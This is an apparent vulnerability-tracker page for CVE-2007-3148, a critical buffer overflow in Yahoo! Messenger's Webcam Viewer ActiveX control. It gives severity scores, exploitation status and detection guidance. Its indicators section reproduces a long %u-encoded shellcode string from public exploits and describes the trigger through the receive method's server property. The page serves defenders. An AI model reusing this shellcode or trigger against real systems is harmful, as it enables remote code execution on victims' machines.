cbcvebase.
CVE-2007-3148
published 2007-06-11

CVE-2007-3148: Buffer overflow in the Yahoo! Webcam Viewer ActiveX control in ywcvwr.dll 2.0.1.4 for Yahoo! Messenger 8.1.0.249 allows remote attackers to execute arbitrary…

PriorityP267critical9.3CVSS 2.0
AVNACMAuNCCICAC
ITWEXPLOITVulnCheck KEV
Exploited in the wild
EPSS
12.34%
95.7th percentile
Buffer overflow in the Yahoo! Webcam Viewer ActiveX control in ywcvwr.dll 2.0.1.4 for Yahoo! Messenger 8.1.0.249 allows remote attackers to execute arbitrary code via a long server property value to the receive method.

Affected

6 ranges
VendorProductVersion rangeFixed in
yahoomessenger
yahoomessenger
yahoomessenger
yahoomessenger
yahoomessenger
yahoomessenger

Detection & IOCsextracted from sources · hover to see the quote

filenameywcvwr.dll
commandreceive
bytes
%u9090%u9090%u9090%uC929%uE983%uD9DB%uD9EE%u2474%u5BF4%u7381%uA913%u4A67%u83CC%uFCEB%uF4E2%u8F55%uCC0C%u67A9%u89C1%uEC95%uC936%u66D1%u47A5%u7FE6%u93C1%u6689%u2FA1%u2E87%uF8C1%u6622%uFDA4%uFE69%u48E6%u1369%u0D4D%u6A63%u0E4B%u9342%u9871%u638D%u2F3F%u3822%uCD6E%u0142%uC0C1%uECE2%uD015%u8CA8%uD0C1%u6622%u45A1%u43F5%u0F4E%uA798%u472E%u57E9%u0CCF%u68D1%u8CC1%uECA5%uD03A%uEC04%uC422%u6C40%uCC4A%uECA9%uF80A%u1BAC%uCC4A%uECA9%uF022%u56F6%uACBC%u8CFF%uA447%uBFD7%uBFA8%uFFC1%u46B4%u30A7%u2BB5%u8941%u33B5%u0456%uA02B%u49CA%uB42F%u67CC%uCC4A%uD0FF
  • The vulnerable ActiveX control is ywcvwr.dll version 2.0.1.4; detect instantiation of this control in browser contexts or presence of the DLL on disk.
  • Exploit triggers via the 'receive' method of the ActiveX control with an overly long 'server' property value; monitor ActiveX method calls to ywcvwr.dll's receive method with large argument strings.
  • ·The exploit targets Yahoo! Messenger version 8.1.0.249 with ywcvwr.dll 2.0.1.4 specifically; other versions may not be vulnerable or may require different offsets.
  • ·Exploit 4043 notes a bug fix over a prior version ('Fixed bug in last post'), indicating the shellcode/heap-spray offsets were revised; earlier variants may differ.
  • ·The download-and-execute shellcode (exploit 4052) requires a valid HTTP or FTP URL to a remote payload; the URL is embedded at runtime and will vary per attacker infrastructure.

CVSS provenance

nvdv2.09.3CRITICALAV:N/AC:M/Au:N/C:C/I:C/A:C
vulncheck9.3CRITICAL
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.